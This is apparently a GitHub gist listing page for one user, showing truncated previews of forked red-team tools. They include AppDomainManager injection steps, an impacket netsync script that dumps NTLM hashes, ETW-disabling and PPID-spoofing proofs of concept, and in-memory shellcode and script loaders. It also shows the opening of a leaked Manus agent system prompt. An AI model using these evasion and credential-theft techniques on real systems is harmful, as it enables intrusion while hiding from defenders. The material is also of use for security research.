GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
B0y1n4o4
/ agent loop
Created
March 10, 2025 13:27
— forked from jlia0/agent loop
Manus tools and prompts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| You are Manus, an AI agent created by the Manus team. | |
| You excel at the following tasks: | |
| 1. Information gathering, fact-checking, and documentation | |
| 2. Data processing, analysis, and visualization | |
| 3. Writing multi-chapter articles and in-depth research reports | |
| 4. Creating websites, applications, and tools | |
| 5. Using programming to solve various problems beyond development | |
| 6. Various tasks that can be accomplished using computers and the internet |
B0y1n4o4
/ netdumper.py
Created
March 7, 2025 10:08
— forked from ThePirateWhoSmellsOfSunflowers/netdumper.py
This script perform a netsync attack. No SMB involved
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse | |
| # This script perform a netsync attack. No SMB involved | |
| # My first idea was to only use netlogon SSP, however SAMR seems not compatible |
B0y1n4o4
/ env_var_spoofing_poc.cpp
Created
June 7, 2020 11:31
— forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
B0y1n4o4
/ EtwpTest.cs
Created
May 10, 2020 14:11
— forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
B0y1n4o4
/ _Instructions_Reproduce.md
Created
April 30, 2020 09:12
GhostLoader - AppDomainManager - Injection - 攻壳机动队
B0y1n4o4
/ clr_via_native.c
Created
April 5, 2020 07:17
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
B0y1n4o4
/ PPID Spoof & BlockDLLs
Created
January 13, 2020 23:46
— forked from rasta-mouse/PPID Spoof & BlockDLLs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
B0y1n4o4
/ PCMPBNMBAO_x86_poc.vba
Created
November 5, 2019 02:47
— forked from xpn/PCMPBNMBAO_x86_poc.vba
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
| ' by @_xpn_ | |
| ' | |
| ' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
| Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
| Const HEAP_ZERO_MEMORY = &H8& | |
| Const SW_HIDE = &H0& | |
| Const MAX_PATH = 260 | |
| Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
B0y1n4o4
/ runscript.c
Created
November 4, 2019 08:23
— forked from odzhan/runscript.c
In-memory execution of VBScript, JavaScript or JScript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| BSD 3-Clause License | |
| Copyright (c) 2019, Odzhan. All rights reserved. | |
| Redistribution and use in source and binary forms, with or without | |
| modification, are permitted provided that the following conditions are met: | |
| * Redistributions of source code must retain the above copyright notice, this | |
| list of conditions and the following disclaimer. |
B0y1n4o4
/ TestAssembly.cs
Created
October 31, 2019 12:14
— forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
NewerOlder